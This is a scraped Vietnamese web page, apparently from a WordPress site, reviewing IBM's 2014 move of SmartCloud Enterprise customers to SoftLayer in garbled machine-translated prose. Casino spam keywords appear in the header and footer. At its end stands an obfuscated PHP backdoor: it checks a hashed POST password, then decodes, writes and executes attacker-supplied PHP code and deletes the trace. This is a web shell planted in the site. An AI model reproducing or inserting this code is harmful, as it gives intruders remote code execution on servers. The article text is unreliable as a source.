Đánh giá công nghệ lưu trữ IBM SoftLayer
jeu plinko avis pin up catcasino vavada официальный jucky jet

Đánh giá công nghệ lưu trữ IBM SoftLayer

Ngày 23/07/2014 đăng bởi seo3.VS [email protected]

Khách hàng của IBM SoftLayer người đã đánh giá SmartCloud Enterprise nói nó không ngạc nhiên IBM sẽ làm cho sự lựa chọn giống như họ đã làm.

Big Blue đã xác nhận nó sẽ tắt IBM SmartCloud Enterprise dịch vụ như của ngày 31 tháng 1 ủng hộ SoftLayer, mà nó có được 8 tháng 7.

Nó gửi một thông báo cho khách hàng 30 tháng 10, trong đó nó được cung cấp dịch vụ di dân tự do thông qua Racemi vào SoftLayer từ IBM SmartCloud Enterprise. Dịch vụ SmartCloud Enterprise + quản lý sẽ tiếp tục chạy và không bị ảnh hưởng, theo các quan chức của IBM.

IBM đã đăng một danh sách 10 bước được yêu cầu để di chuyển từ IBM SmartCloud Enterprise để SoftLayer. Đầu tiên là để chạy một phân tích đầy đủ về cách sử dụng hiện tại, bao gồm cả hệ điều hành, kích thước máy ảo, các yêu cầu lưu trữ liên tục, các địa chỉ IP dành riêng, các ứng dụng và dịch vụ sử dụng.
Đó là sau đó đến khách hàng để tạo ra các tài khoản với SoftLayer và Racemi và thực hiện việc di cư tự sử dụng Racemi của phần mềm như một dịch vụ . SoftLayer cung cấp một dịch vụ truyền dữ liệu cho phép người dùng để vận chuyển lượng lớn dữ liệu trên các thiết bị USB 2.0, cũng như một thử nghiệm miễn phí một tháng trên trường đám mây công cộng của nó.

Do tính chất do-it-yourself cơ sở hạ tầng như một dịch vụ (IaaS), quá trình chuyển đổi này có thể sẽ chịu đối với hầu hết khách hàng, theo Carl Brooks, nhà phân tích của 451 nghiên cứu có trụ sở tại Boston.

“Và thực tế là bạn đang nhận được quyền truy cập vào một nền tảng trực tuyến rất phức tạp, cũng như một dịch vụ chuyển đổi trực tuyến rất phức tạp, nó không phải là nhiều nặng nâng”, ông nói. “Mặc dù nó chắc chắn không đầy đủ dịch vụ, tôi sẽ nói rằng.”

IBM đã không trả lời cho câu hỏi có bao nhiêu khách hàng sẽ phải đối mặt với những trở ngại di chuyển xuống như báo chí thời gian.

Trên đây là bài viết đánh giá công nghệ lưu trữ IBM SoftLayer của người dùng.Hy vọng sẽ giúp ích cho các bạn tìm hiểu về công nghê lưu trư này.

Xem thêm: Lưu trữ trên dịch vụ đám mây có sẵn trên SoftLayer

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}